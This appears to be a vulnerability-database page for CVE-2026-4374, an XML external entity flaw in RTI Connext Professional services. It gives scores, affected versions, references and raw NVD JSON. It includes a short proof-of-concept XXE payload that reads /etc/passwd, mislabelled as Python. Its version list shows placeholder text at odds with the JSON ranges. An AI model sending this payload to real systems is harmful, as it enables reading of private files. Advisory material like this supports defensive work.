CVE-2026-4374

Description

Improper Restriction of XML External Entity Reference vulnerability in RTI Connext Professional (Routing Service,Observability Collector,Recording Service,Queueing Service,Cloud Discovery Service) allows Serialized Data External Linking, Data Serializat...

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:* - VULNERABLE

RTI Connext Professional (Routing Service) < 具体版本暂未披露

RTI Connext Professional (Observability Collector) < 具体版本暂未披露

RTI Connext Professional (Recording Service) < 具体版本暂未披露

RTI Connext Professional (Queueing Service) < 具体版本暂未披露

RTI Connext Professional (Cloud Discovery Service) < 具体版本暂未披露

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?xml version="1.0" encoding="UTF-8"?>
<!-- PoC for XXE vulnerability in CVE-2026-4374 -->
<!DOCTYPE data [
  <!ELEMENT data ANY >
  <!-- Define an external entity to read a local file -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<data>&xxe;</data>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4374
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4374
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4374/
[4] VulDB https://vuldb.com/cve/CVE-2026-4374
[5] https://www.rti.com/vulnerabilities/#cve-2026-4374

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4374", "sourceIdentifier": "3f572a00-62e2-4423-959a-7ea25eff1638", "published": "2026-04-01T02:16:03.540", "lastModified": "2026-04-21T00:06:11.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of XML External Entity Reference vulnerability in RTI Connext Professional (Routing Service,Observability Collector,Recording Service,Queueing Service,Cloud Discovery Service) allows Serialized Data External Linking, Data Serializat..."}, {"lang": "es", "value": "Vulnerabilidad de restricción incorrecta de referencia a entidad externa XML en RTI Connext Professional (Routing Service, Observability Collector, Recording Service, Queueing Service, Cloud Discovery Service) permite el enlace externo de datos serializados, la serialización de datos..."}], "metrics": {"cvssMetricV40": [{"source": "3f572a00-62e2-4423-959a-7ea25eff1638", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "3f572a00-62e2-4423-959a-7ea25eff1638", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndIncluding": "5.3.1.45", "matchCriteriaId": "F8B1FE0A-A2E0-45AA-9ED2-CED9BDA02047"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.1.40", "matchCriteriaId": "8369CEAE-4767-4910-AD55-3C6E8898EE5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndIncluding": "6.1.2.27", "matchCriteriaId": "2042782E-93AB-4D92-9DB0-3377557B5B46"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.1.1", "matchCriteriaId": "9F77FCD6-D5AC-46DF-99BF-D9E30919B5E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rti:connext_professional:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.7.0", "matchCriteriaId": "DF87EB0F-A1CD-40D1-96F0-53D964E34BFC"}]}]}], "references": [{"url": "https://www.rti.com/vulnerabilities/#cve-2026-4374", "source": "3f572a00-62e2-4423-959a-7ea25eff1638", "tags": ["Vendor Advisory"]}]}}